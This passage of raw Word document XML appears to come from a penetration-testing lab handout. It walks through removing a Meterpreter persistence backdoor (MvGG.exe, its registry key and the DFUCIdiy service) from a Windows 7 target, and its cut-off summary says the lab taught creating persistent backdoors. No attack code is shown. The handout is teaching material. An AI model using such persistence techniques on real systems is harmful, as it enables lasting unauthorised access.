        <w:t xml:space="preserve"> click OK and close out Folder Options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A7ECA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4870F323" wp14:editId="302C6E77">
            <wp:extent cx="3076303" cy="2449677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933" cy="245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EE3B5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Click on Start. Click on Computer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49325804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Open your Local disk (c:)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B677350" w14:textId="77777777" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00024084">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D10F3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3396A286" wp14:editId="34E5B99C">
            <wp:extent cx="3000794" cy="847843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8015" w14:textId="2355ECD1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Follow the path to find the exploit. My username is expat. Yours will differ!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA16C0F" w14:textId="77777777" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00024084">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC492F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\expat\AppData\Local\Temp\MvGG.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBB71C3" w14:textId="77777777" w:rsidR="00024084" w:rsidRPr="002D10F3" w:rsidRDefault="00024084" w:rsidP="00024084">
      <w:pPr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noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C0E61B9" wp14:editId="453B3F1F">
            <wp:extent cx="3866606" cy="1420569"/>
            <wp:effectExtent l="0" t="0" r="63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899" cy="144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EB5B4" w14:textId="1023028D" w:rsidR="00717F0B" w:rsidRPr="00717F0B" w:rsidRDefault="00024084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S</w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ince the file is in use, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> will not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow it</w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. We first need to stop the service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the MvGG.exe</w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> created, end the process tree for the file, delete the executable and then delete the registry key that calls on the executable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFBE65A" w14:textId="44E659F4" w:rsidR="00717F0B" w:rsidRDefault="00760012" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760012">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on Start. In the search bar, type </w:t>
      </w:r>
      <w:r w:rsidRPr="00760012">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>regedit</w:t>
      </w:r>
      <w:r w:rsidRPr="00760012">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Press enter.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Click on Edit and the</w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Find. In the Find what field, type </w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MvGG</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">exe. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE6213B" w14:textId="72B31DD8" w:rsidR="00717F0B" w:rsidRDefault="00717F0B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4DD8F6CA" wp14:editId="066FE2AA">
            <wp:extent cx="2802980" cy="170470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711" cy="174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E1FC3" w14:textId="3C949A5C" w:rsidR="00760012" w:rsidRDefault="00760012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The search </w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">results </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">show that the </w:t>
      </w:r>
      <w:r w:rsidRPr="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MvGG.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is running as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DFUCIdiy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> service. </w:t>
      </w:r>
      <w:r w:rsidR="00054F40">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Minimize the registry editor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7DC690" w14:textId="081E807C" w:rsidR="00760012" w:rsidRDefault="00760012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0D34FF6E" wp14:editId="7596F88C">
            <wp:extent cx="4186646" cy="1598090"/>
            <wp:effectExtent l="0" t="0" r="4445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407" cy="163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D32AD" w14:textId="7CB8E0AB" w:rsidR="00054F40" w:rsidRDefault="00760012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Right</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">click on the </w:t>
      </w:r>
      <w:r w:rsidR="00F42E42">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 7 bottom </w:t>
      </w:r>
      <w:r w:rsidR="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toolbar</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F42E42">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and from the context menu</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F42E42">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> select </w:t>
      </w:r>
      <w:r w:rsidR="00F42E42" w:rsidRPr="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Task Manager</w:t>
      </w:r>
      <w:r w:rsidR="00F42E42">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Click on the </w:t>
      </w:r>
      <w:r w:rsidR="00F42E42" w:rsidRPr="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Services</w:t>
      </w:r>
      <w:r w:rsidR="00F42E42">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab. Under Name, find the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F42E42" w:rsidRPr="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DFUCIdiy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C4E0F" w:rsidRPr="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidR="00F42E42">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Note the process ID. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5D12A" w14:textId="554345C2" w:rsidR="00F42E42" w:rsidRDefault="00F42E42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2C28685C" wp14:editId="67EFBFA4">
            <wp:extent cx="3873137" cy="2340848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876" cy="237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7F4DA" w14:textId="4D213D03" w:rsidR="00BE3DE0" w:rsidRDefault="00BE3DE0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Right</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>click on the service</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and from the context menu, select Stop Service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679AA1A" w14:textId="747F6808" w:rsidR="00054F40" w:rsidRDefault="00BE3DE0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3B444DC2" wp14:editId="447FC08B">
            <wp:extent cx="2383790" cy="9925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D7ED" w14:textId="56C6EAC6" w:rsidR="00760012" w:rsidRDefault="00F42E42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Click on View. </w:t>
      </w:r>
      <w:r w:rsidR="00BE3DE0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 xml:space="preserve">Click, Select Columns. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D641590" w14:textId="77777777" w:rsidR="00054F40" w:rsidRDefault="00054F40" w:rsidP="00054F40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE3DE0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C8EDBB0" wp14:editId="00D5D5CD">
            <wp:extent cx="2383790" cy="1135138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17404" cy="11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20D5" w14:textId="0F2E8405" w:rsidR="00054F40" w:rsidRDefault="00054F40" w:rsidP="00054F4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Check the first box PID (Process Identifier)</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Click OK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A47E51" w14:textId="72171A44" w:rsidR="00054F40" w:rsidRDefault="00054F40" w:rsidP="00054F4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Click on the Process tab. At the bottom, check the box, </w:t>
      </w:r>
      <w:r w:rsidRPr="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Show processes from all users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2800653E" w14:textId="77777777" w:rsidR="00054F40" w:rsidRDefault="00054F40" w:rsidP="00054F40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59076B43" wp14:editId="7D3027C7">
            <wp:extent cx="1534886" cy="2074566"/>
            <wp:effectExtent l="0" t="0" r="8255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223" cy="211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8BAB0" w14:textId="356C5F5F" w:rsidR="00054F40" w:rsidRPr="00760012" w:rsidRDefault="00054F40" w:rsidP="00054F4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Right</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">click on each MvGG.exe process, and from the context menu, select </w:t>
      </w:r>
      <w:r w:rsidRPr="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>End Process Tree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455ED07F" w14:textId="77777777" w:rsidR="00054F40" w:rsidRDefault="00054F40" w:rsidP="00054F40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0D313758" wp14:editId="20090471">
            <wp:extent cx="1920240" cy="1777813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971" cy="180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3A670" w14:textId="6E73FCB8" w:rsidR="00054F40" w:rsidRDefault="00717F0B" w:rsidP="00054F4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Bring back up your Registry Editor. </w:t>
      </w:r>
      <w:r w:rsidR="00054F40">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Delete the entire key f</w:t>
      </w:r>
      <w:r w:rsidR="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ro</w:t>
      </w:r>
      <w:r w:rsidR="00054F40">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>m the registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1FA5C1" w14:textId="61DF5814" w:rsidR="00054F40" w:rsidRDefault="00054F40" w:rsidP="00054F40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1DE86C01" wp14:editId="3E874BCA">
            <wp:extent cx="2331720" cy="268651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349" cy="270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BE414" w14:textId="3D728F49" w:rsidR="00542BD7" w:rsidRDefault="00054F40" w:rsidP="00542BD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024084">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Browse to </w:t>
      </w:r>
      <w:r w:rsidR="00024084" w:rsidRPr="00024084">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\expat\AppData\Local\Temp\MvGG.exe</w:t>
      </w:r>
      <w:r w:rsidR="00024084">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and d</w:t>
      </w:r>
      <w:r w:rsidR="00F5484C" w:rsidRPr="00F5484C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">elete </w:t>
      </w:r>
      <w:r w:rsidR="00F5484C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the exploit</w:t>
      </w:r>
      <w:r w:rsidR="00F5484C" w:rsidRPr="00F5484C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the </w:t>
      </w:r>
      <w:r w:rsidR="00542BD7" w:rsidRPr="00542BD7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7193BC4E" w14:textId="6EEFAB13" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00542BD7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0FF61735" wp14:editId="0AE91CBE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-19594</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3629</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2213610" cy="2912745"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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761E6B" w14:textId="5A69AA46" w:rsidR="00024084" w:rsidRPr="00024084" w:rsidRDefault="00024084" w:rsidP="00542BD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7679A9A2" w14:textId="6ECDB930" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2F80B2" w14:textId="57E84492" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEE495C" w14:textId="0EB54C66" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440ECBB3" w14:textId="71AE2E95" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6B4308" w14:textId="32C6506E" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46229171" w14:textId="77777777" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BFDF7B" w14:textId="77777777" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6480CD5D" w14:textId="77777777" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E83EA41" w14:textId="77777777" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C8532A" w14:textId="37110987" w:rsidR="00923D77" w:rsidRDefault="00C222C3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Restart your Windows 7 target. </w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that you</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Meterpreter session did not auto</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00717F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">reconnect. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A23080" w14:textId="23A7497A" w:rsidR="00717F0B" w:rsidRDefault="00717F0B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Closeout your Kali terminal. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47527752" w14:textId="2677D6FE" w:rsidR="00717F0B" w:rsidRDefault="00717F0B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End of the lab!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7F869F" w14:textId="14964408" w:rsidR="004C4E0F" w:rsidRPr="00D80CD0" w:rsidRDefault="004C4E0F" w:rsidP="00F5484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D80CD0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Summary –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456A5E46" w14:textId="2A6C3418" w:rsidR="004C4E0F" w:rsidRDefault="004C4E0F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In this lab, we learned how to create a persistent backdoor using </w:t>
      </w:r>
      <w:r w:rsidR="00D80CD0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
